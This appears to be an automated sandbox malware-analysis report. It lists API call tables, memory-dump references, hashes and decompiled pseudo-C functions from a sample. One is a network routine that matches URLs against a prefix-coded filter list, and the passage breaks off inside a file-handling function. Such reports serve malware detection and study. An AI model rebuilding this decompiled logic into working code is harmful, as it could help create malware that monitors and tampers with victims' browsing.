0x00405323
0x00405329
0x0040532b
0x00405330
0x00000000
0x00000000
0x004052de
0x004052fa
0x004052fe
0x00405305
0x0040531c
0x0040531e
0x0040531e
0x0040531c
0x0040533d
0x00405345
0x00000000
0x00000000
0x00000000
0x00405345
0x004052d1
0x004052d5
0x004052d5
0x00000000
0x004052d5
0x004052c5
0x00000000
0x004052c5
0x00000000
0x004052b1
0x004052a5
0x00405201
0x00405219
0x0040522b
0x00405231
0x00000000
0x00000000
0x00000000
0x00405231
0x00405236
0x00000000
0x00000000
0x00000000
0x00405236
0x004051ca
0x00000000

APIs

Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54

WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0040520C
WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 0040529D
#1.WS2_32(?,00000000,00000000), ref: 00405329
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0040533D
CloseHandle.KERNEL32(?), ref: 0040535E
CloseHandle.KERNEL32(?), ref: 0040536D

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingle
String ID:
API String ID: 2824434197-0
Opcode ID: bce90c30cdb100cdad9420987a6e34dc2aa7ecc3220726be04f6cb3f87ca7aea
Instruction ID: b1b6b72dbccb16d205e8212464e50ac053542ec670d1af532527122d8273def4
Opcode Fuzzy Hash: bce90c30cdb100cdad9420987a6e34dc2aa7ecc3220726be04f6cb3f87ca7aea
Instruction Fuzzy Hash: BD517B71508A01AFC720EB65DC84CAFB7E8EBC8744F60092EF591E22A0D7389D458F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419C89, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419C89(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

0x00419c92
0x00419c99
0x00419c9b
0x00419c9d
0x00419ca3
0x00419cb6
0x00419cb9
0x00419cbc
0x00419cc9
0x00419cd1
0x00419cdc
0x00419cfb
0x00419cff
0x00419d02
0x00419d20
0x00419d20
0x00419d23
0x00419d43
0x00000000
0x00419d25
0x00419d25
0x00419d25
0x00419d26
0x00419d3e
0x00419d28
0x00419d28
0x00419d28
0x00419d29
0x00419d36
0x00000000
0x00419d2b
0x00419d2b
0x00419d2c
0x00000000
0x00000000
0x00419d2c
0x00419d29
0x00419d26
0x00419d04
0x00419d04
0x00419d1b
0x00419d1b
0x00000000
0x00419d06
0x00419d07
0x00419d07
0x00419d08
0x00000000
0x00419d0a
0x00419d0b
0x00419d0b
0x00419d0c
0x00419d2e
0x00419d2e
0x00000000
0x00419d0e
0x00419d0e
0x00419d0e
0x00419d11
0x00419d39
0x00419d39
0x00419d13
0x00419d13
0x00419d13
0x00419d14
0x00419d31
0x00419d31
0x00419d16
0x00419d16
0x00419d17
0x00419d46
0x00419d46
0x00419d46
0x00419d17
0x00419d14
0x00419d11
0x00419d0c
0x00419d08
0x00419d04
0x00419cde
0x00419cde
0x00419ce1
0x00419ce7
0x00419ced
0x00419cf0
0x00419cf3
0x00419cf6
0x00419cf6
0x00419d4d
0x00419d55
0x00419d67
0x00419d7b
0x00419d7b
0x00000000
0x00419d9f
0x00419d55
0x00419da9

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00419C9D
ReleaseMutex.KERNEL32(?), ref: 00419CBC
GetWindowRect.USER32 ref: 00419CC9
IsRectEmpty.USER32 ref: 00419D4D
GetWindowLongW.USER32(?,000000F0), ref: 00419D5C
GetParent.USER32(?), ref: 00419D72
MapWindowPoints.USER32 ref: 00419D7B
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00419D9F

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 74d79d5d255c72d56ea8efc558eb35c3b8a67add84ad0edb3f99780bece9d78a
Instruction ID: cb5d7c41d36cdf1ee14a90c2e80689a5c8d78c459ccd8f410a7c3d53a9fb4bcc
Opcode Fuzzy Hash: 74d79d5d255c72d56ea8efc558eb35c3b8a67add84ad0edb3f99780bece9d78a
Instruction Fuzzy Hash: F4416D71D0020AEFDB108FDAEA59AFEBBB4FB04750F10056AE511E6660D7789E80DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00419C89, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419C89(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00419C9D
ReleaseMutex.KERNEL32(?), ref: 00419CBC
GetWindowRect.USER32 ref: 00419CC9
IsRectEmpty.USER32 ref: 00419D4D
GetWindowLongW.USER32(?,000000F0), ref: 00419D5C
GetParent.USER32(?), ref: 00419D72
MapWindowPoints.USER32 ref: 00419D7B
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00419D9F

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
String ID:
API String ID: 2634726239-0
Opcode ID: 74d79d5d255c72d56ea8efc558eb35c3b8a67add84ad0edb3f99780bece9d78a
Instruction ID: cb5d7c41d36cdf1ee14a90c2e80689a5c8d78c459ccd8f410a7c3d53a9fb4bcc
Opcode Fuzzy Hash: 74d79d5d255c72d56ea8efc558eb35c3b8a67add84ad0edb3f99780bece9d78a
Instruction Fuzzy Hash: F4416D71D0020AEFDB108FDAEA59AFEBBB4FB04750F10056AE511E6660D7789E80DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5A4, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041B5A4(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v60;
				char _v72;
				signed int _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v148;
				void* _v160;
				char _v168;
				char _v272;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t128;
				intOrPtr* _t129;
				char* _t130;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t152;
				void* _t154;
				char* _t156;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t167;
				void* _t172;
				intOrPtr _t174;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t187;
				signed int _t189;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t204;
				void* _t207;
				signed int _t210;
				void* _t214;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t224;
				char* _t227;
				intOrPtr _t228;
				char* _t233;
				char* _t236;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t244;
				void* _t247;

				_t217 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x423a34);
				_t225 =  *0x423a50;
				if( *0x423a50 == 0 ||  *0x423a4c == 0) {
					_t240 = _a4;
				} else {
					_t240 = _a4;
					_t230 = 0;
					if(E0041ACD9(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
						_t210 = E00411789();
						_v20 = _t210;
						if(_t210 != 0) {
							_t214 = E0041AD93(0, 4,  &_v20,  *0x423a4c);
							_push(_v20);
							if(_t214 == 0) {
								E00411CFE();
							}
							E004117F4(_t225);
						}
						E00411CFE( *0x423a4c);
						E00411CFE( *0x423a50);
						 *0x423a4c = _t217;
						 *0x423a50 = _t217;
					}
				}
				LeaveCriticalSection(0x423a34);
				_t128 =  *((intOrPtr*)(_t240 + 0x40));
				_t254 = _t128 - _t217;
				if(_t128 == _t217) {
					L38:
					if((_v16 & 0x00000001) == 0) {
						_t187 =  *((intOrPtr*)(_t240 + 0x44));
						_t272 = _t187 - _t217;
						if(_t187 != _t217 && E0041AF94(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
							_v16 = _v16 | 0x00000001;
						}
					}
					if( *(_t240 + 0x20) >= 0x21) {
						_t182 = 0x10;
						E00419861(_t182,  &_v72);
						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
						if(E00411D6F( &_v72, _t238, 0x21) == 0) {
							_t186 =  *((intOrPtr*)(_t238 + 0x21));
							if(_t186 == 0x3b || _t186 == 0) {
								_v16 = _v16 | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
					_v24 = _t217;
					if(_t129 == _t217 ||  *_t129 == _t217) {
						L52:
						_t130 =  *((intOrPtr*)(_t240 + 0x34));
						__eflags = _t130 - _t217;
						if(_t130 == _t217) {
							goto L60;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L60;
						}
						_t167 = 0x12;
						E00419897(_t167,  &_v168);
						_t172 = E00412A6C( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
						_t247 = _t247 + 0xc;
						goto L55;
					} else {
						_t176 =  *((intOrPtr*)(_t240 + 0x30));
						if(_t176 == _t217 ||  *_t176 == _t217) {
							goto L52;
						} else {
							_t177 = 0x11;
							E00419897(_t177,  &_v272);
							_push( *((intOrPtr*)(_a4 + 0x30)));
							_t172 = E00412A6C( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
							_t247 = _t247 + 0x10;
							L55:
							if(_t172 > _t217) {
								_t174 = E004130AD(_v24, _t172 + _t172);
								if( *0x423a54 != _t174) {
									_t64 =  &_v16;
									 *_t64 = _v16 | 0x00000020;
									__eflags =  *_t64;
									 *0x423a54 = _t174;
								} else {
									E00411CFE(_v24);
									_v24 = _t217;
								}
							}
							_t240 = _a4;
							L60:
							if(_v9 != 0xff) {
								__eflags = _v9 - 1;
								if(_v9 != 1) {
									L67:
									if((_v16 & 0x00000008) == 0) {
										L93:
										E00411CFE(_v24);
										_t218 = _v16;
										if((_t218 & 0x00000001) == 0) {
											if(E0041AFFC(_t230, _t240) != 0) {
												_t218 = _t218 | 0x00000002;
											}
											if((_t218 & 0x00000010) != 0 && E0041B3B6(_t240, _t230) != 0) {
												_t218 = _t218 | 0x00000004;
											}
										}
										return _t218;
									}
									_t136 =  *(_t240 + 0x28);
									_t219 = 0;
									if( *(_t240 + 0x28) != 0) {
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) == 0) {
											__eflags =  *(_t240 + 0x20);
											if( *(_t240 + 0x20) != 0) {
												L92:
												_v16 = _v16 & 0xfffffff7;
												goto L93;
											}
											_t233 =  &_v36;
											_t137 = 0xc;
											E00419861(_t137, _t233);
											_push(_t233);
											_push(9);
											L81:
											_pop(_t140);
											_v20 = E0041215C(_t140);
											L82:
											if(_v20 == 0) {
												goto L92;
											}
											E004102B4( &_v32);
											_t144 = E00411F3E( *(_t240 + 0xc), 0,  *(_t240 + 8));
											_t235 = _t144;
											if(_t144 != 0) {
												_t230 = 0x3c;
												E00411DB1( &_v160,  &_v160, 0, _t230);
												_v160 = _t230;
												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
													_t152 = 0xa;
													E00419897(_t152,  &_v272);
													_t154 = 0xd;
													E00419897(_t154,  &_v60);
													_t227 =  *(_a4 + 0x10);
													_t156 = 0x403180;
													_t230 =  ==  ? 0x403180 : _v24;
													_t244 =  ==  ? 0x403180 : _v32;
													if(_t227 == 0) {
														_t227 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t156 =  &_v60;
													}
													_push(_v20);
													_push(_t230);
													_push(_t244);
													_push(_t227);
													_push(_t156);
													_t161 = E00407CCA(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
													_t240 = _a4;
													_t219 = _t161;
												}
												E00411CFE(_t235);
											}
											E00411CFE(_v32);
											E00411CFE(_v20);
											if(_t219 != 0) {
												goto L93;
											} else {
												goto L92;
											}
										}
										_t230 = E0041215C(_t136,  *((intOrPtr*)(_t240 + 0x24)));
										_v20 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											goto L92;
										}
										_t163 = 0;
										__eflags =  *(_t240 + 0x28);
										if( *(_t240 + 0x28) <= 0) {
											goto L82;
										} else {
											goto L73;
										}
										do {
											L73:
											_t228 =  *((intOrPtr*)(_t163 + _t230));
											__eflags = _t228 - 0x26;
											if(_t228 != 0x26) {
												__eflags = _t228 - 0x2b;
												if(_t228 == 0x2b) {
													 *((char*)(_t163 + _t230)) = 0x20;
												}
											} else {
												 *((char*)(_t163 + _t230)) = 0xa;
											}
											_t163 = _t163 + 1;
											__eflags = _t163 -  *(_t240 + 0x28);
										} while (_t163 <  *(_t240 + 0x28));
										goto L82;
									}
									_t236 =  &_v36;
									_t164 = 0xb;
									E00419861(_t164, _t236);
									_push(_t236);
									_push(7);
									goto L81;
								}
								L66:
								_v16 = _v16 | 0x00000008;
								goto L67;
							}
							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
								if((_v16 & 0x00000020) == 0) {
									goto L67;
								}
							}
							goto L66;
						}
					}
				}
				_t189 = E0041787A( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
				_t225 = _v32;
				_v20 = _t189;
				if(E00412B90(_t189, _v32) == 0) {
					L37:
					E00411CFE(_v20);
					_t217 = 0;
					goto L38;
				} else {
					_t239 = _v20;
					do {
						_t225 = _t239 + 1;
						if( *_t225 == 0) {
							goto L36;
						}
						_t194 =  *_t239;
						if(_t194 == 0x21) {
							L22:
							_t239 = _t225;
							L23:
							_t230 = 0;
							_t225 = _t239;
							if(E0041ACD9(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
								goto L36;
							}
							_t197 = _t224;
							if(_t197 == 0) {
								_v9 = 0;
								L35:
								if(_t224 != 2) {
									goto L37;
								}
								goto L36;
							}
							_t198 = _t197 - 1;
							if(_t198 == 0) {
								L30:
								_v9 = 1;
								goto L35;
							}
							_t199 = _t198 - 1;
							if(_t199 == 0) {
								_t230 = 0x3c;
								E00411DB1( &_v96,  &_v96, 0, 0);
								_v80 =  &_v536;
								_v96 = 0;
								_v76 = 0x103;
								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
								__eflags = _t204 - 1;
								if(_t204 == 1) {
									__eflags = _v76;
									if(_v76 > 0) {
										E0041026E( &_v536);
									}
								}
								goto L35;
							}
							_t207 = _t199 - 1;
							if(_t207 == 0 || _t207 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L30;
							} else {
								goto L35;
							}
						}
						if(_t194 == 0x2d) {
							goto L22;
						}
						if(_t194 == 0x40) {
							goto L22;
						}
						if(_t194 == 0x5e) {
							_t224 = 4;
							goto L22;
						} else {
							_t224 = 0;
							goto L23;
						}
						L36:
						_t239 = E00412BCE(_t239, 1);
					} while (_t239 != 0);
					goto L37;
				}
			}

0x0041b5b5
0x0041b5b8
0x0041b5bb
0x0041b5bf
0x0041b5c5
0x0041b5cd
0x0041b63e
0x0041b5d7
0x0041b5d7
0x0041b5dd
0x0041b5e9
0x0041b5eb
0x0041b5f0
0x0041b5f5
0x0041b603
0x0041b608
0x0041b60d
0x0041b60f
0x0041b614
0x0041b615
0x0041b615
0x0041b620
0x0041b62b
0x0041b630
0x0041b636
0x0041b636
0x0041b5e9
0x0041b642
0x0041b648
0x0041b64b
0x0041b64d
0x0041b752
0x0041b756
0x0041b758
0x0041b75b
0x0041b75d
0x0041b772
0x0041b772
0x0041b75d
0x0041b77a
0x0041b781
0x0041b782
0x0041b787
0x0041b798
0x0041b79a
0x0041b79f
0x0041b7a5
0x0041b7a5
0x0041b79f
0x0041b798
0x0041b7a9
0x0041b7ac
0x0041b7b1
0x0041b7ec
0x0041b7ec
0x0041b7ef
0x0041b7f1
0x00000000
0x00000000
0x0041b7f3
0x0041b7f6
0x00000000
0x00000000
0x0041b800
0x0041b801
0x0041b813
0x0041b818
0x00000000
0x0041b7b8
0x0041b7b8
0x0041b7bd
0x00000000
0x0041b7c4
0x0041b7cc
0x0041b7cd
0x0041b7d5
0x0041b7e2
0x0041b7e7
0x0041b81b
0x0041b81d
0x0041b825
0x0041b830
0x0041b83f
0x0041b83f
0x0041b83f
0x0041b843
0x0041b832
0x0041b835
0x0041b83a
0x0041b83a
0x0041b830
0x0041b848
0x0041b84b
0x0041b84f
0x0041b864
0x0041b868
0x0041b86e
0x0041b872
0x0041b9e5
0x0041b9e8
0x0041b9ed
0x0041b9f3
0x0041b9fd
0x0041b9ff
0x0041b9ff
0x0041ba05
0x0041ba12
0x0041ba12
0x0041ba05
0x0041ba1b
0x0041ba1b
0x0041b878
0x0041b87b
0x0041b87f
0x0041b893
0x0041b897
0x0041b8d4
0x0041b8d8
0x0041b9e1
0x0041b9e1
0x00000000
0x0041b9e1
0x0041b8e0
0x0041b8e3
0x0041b8e4
0x0041b8eb
0x0041b8ec
0x0041b8ee
0x0041b8ee
0x0041b8f4
0x0041b8f7
0x0041b8fb
0x00000000
0x00000000
0x0041b904
0x0041b911
0x0041b916
0x0041b91a
0x0041b922
0x0041b92d
0x0041b93e
0x0041b950
0x0041b95a
0x0041b95b
0x0041b965
0x0041b966
0x0041b974
0x0041b979
0x0041b97e
0x0041b983
0x0041b988
0x0041b98a
0x0041b98a
0x0041b993
0x0041b995
0x0041b995
0x0041b998
0x0041b99b
0x0041b99c
0x0041b99d
0x0041b99e
0x0041b9ba
0x0041b9bf
0x0041b9c5
0x0041b9c5
0x0041b9c8
0x0041b9c8
0x0041b9d0
0x0041b9d8
0x0041b9df
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b9df
0x0041b8a1
0x0041b8a3
0x0041b8a6
0x0041b8a8
0x00000000
0x00000000
0x0041b8ae
0x0041b8b0
0x0041b8b3
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b8b5
0x0041b8b5
0x0041b8b5
0x0041b8b8
0x0041b8bb
0x0041b8c3
0x0041b8c6
0x0041b8c8
0x0041b8c8
0x0041b8bd
0x0041b8bd
0x0041b8bd
0x0041b8cc
0x0041b8cd
0x0041b8cd
0x00000000
0x0041b8d2
0x0041b883
0x0041b886
0x0041b887
0x0041b88e
0x0041b88f
0x00000000
0x0041b88f
0x0041b86a
0x0041b86a
0x00000000
0x0041b86a
0x0041b855
0x0041b860
0x00000000
0x00000000
0x0041b862
0x00000000
0x0041b855
0x0041b7bd
0x0041b7b1
0x0041b661
0x0041b666
0x0041b669
0x0041b673
0x0041b748
0x0041b74b
0x0041b750
0x00000000
0x0041b679
0x0041b679
0x0041b67c
0x0041b67c
0x0041b682
0x00000000
0x00000000
0x0041b688
0x0041b68c
0x0041b6ac
0x0041b6ac
0x0041b6ae
0x0041b6b1
0x0041b6b6
0x0041b6bf
0x00000000
0x00000000
0x0041b6c4
0x0041b6c7
0x0041b72c
0x0041b730
0x0041b733
0x00000000
0x00000000
0x00000000
0x0041b733
0x0041b6c9
0x0041b6ca
0x0041b6d9
0x0041b6d9
0x00000000
0x0041b6d9
0x0041b6cc
0x0041b6cd
0x0041b6e1
0x0041b6e9
0x0041b6f4
0x0041b700
0x0041b706
0x0041b70d
0x0041b713
0x0041b716
0x0041b718
0x0041b71c
0x0041b725
0x0041b725
0x0041b71c
0x00000000
0x0041b716
0x0041b6cf
0x0041b6d0
0x0041b6d5
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b6d0
0x0041b690
0x00000000
0x0041b6a6
0x0041b694
0x00000000
0x0041b6a2
0x0041b698
0x0041b69e
0x00000000
0x0041b69a
0x0041b69a
0x00000000
0x0041b69a
0x0041b735
0x0041b73e
0x0041b740
0x00000000
0x0041b67c

APIs

EnterCriticalSection.KERNEL32(00423A34,?,?,?), ref: 0041B5BF
LeaveCriticalSection.KERNEL32(00423A34,?,?,?), ref: 0041B642
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0041B70D
InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0041B947

Part of subcall function 00411789: CreateMutexW.KERNEL32(00423B98,00000000,00422BC8,00423A34,000000FF,?,0041B5F0,?,?,?,?,?), ref: 004117B1

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

Strings

, xrefs: 0041B85C
4:B, xrefs: 0041B5B0

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
String ID: $4:B
API String ID: 4018265435-3064615929
Opcode ID: 13b8535eedf5a426c6fdaf723c1b452aecf50b6017ffaad2e81fd6cc8aa2b446
Instruction ID: 3df4092dcce3a9b944c251b69840733d9bfd9e96f4d588785fa9e0b0c16ebbe1
Opcode Fuzzy Hash: 13b8535eedf5a426c6fdaf723c1b452aecf50b6017ffaad2e81fd6cc8aa2b446
Instruction Fuzzy Hash: 39D1D371A002099EDF21AFA1C845BEF7BB5EF45304F04442BE951A72A1C77C9DC2CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407622, Relevance: 10.7, APIs: 7, Instructions: 216
filestringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00407622(WCHAR* __ecx, signed char* _a4) {
				char _v268;
				signed short _v340;
				char _v743;
				signed short _v816;
				char _v1028;
				short _v1548;
				short _v1552;
				intOrPtr _v1556;
				signed char* _v1560;
				signed int _v1564;
				char* _v1568;
				void* _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				void* _v1597;
				signed int _v1600;
				void* __ebx;
				void* __esi;
				signed int _t60;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t80;
				signed int _t83;
				long _t84;
				long _t85;
				signed int _t89;
				signed int _t98;
				signed int _t101;
				signed int _t108;
				signed int _t110;
				WCHAR* _t123;
				signed char _t125;
				signed char* _t131;
				signed int _t134;
				void* _t136;
				void* _t140;
				signed int _t141;

				_t128 = __ecx;
				_t131 = _a4;
				_t60 = E0041CA33(__ecx, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
				_v1596 = _t60;
				if(_t60 != 0) {
					_v1572 =  *0x424024;
					_v1568 =  &_v268;
					_v1580 = E0040747E;
					_v1576 = E004075BA;
					_v1560 = _t131;
					E0041CCD2( &_v1028);
					E00411D3A( &_v268,  &_v743, 0x102);
					_t69 =  *_t131 & 0x000000ff;
					__eflags = _t69;
					if(_t69 == 0) {
						_t71 = _v816 >> 0x10;
						__eflags = _t71;
						_v1596 = _t71;
						_t72 = _v816 & 0x0000ffff;
						goto L7;
					} else {
						__eflags = _t69 == 1;
						if(_t69 == 1) {
							_v1596 = _v340 >> 0x10;
							_t72 = _v340 & 0x0000ffff;
							L7:
							_v1592 = _t72;
						}
					}
					_v1596 = _v1596 * 0xea60;
					_v1592 = _v1592 * 0xea60;
					E00411DB1( &_v1028,  &_v1028, 0, 0x2f4);
					_v1560 = 0;
					_t80 = E0041CB59();
					__eflags = _t80;
					if(_t80 != 0) {
						do {
							__eflags =  *_t131;
							_v1597 = 1;
							if( *_t131 != 0) {
								L24:
								_t83 = E0040B3BB();
								_t138 = _t83;
								__eflags = _t83;
								if(__eflags == 0) {
									goto L29;
								} else {
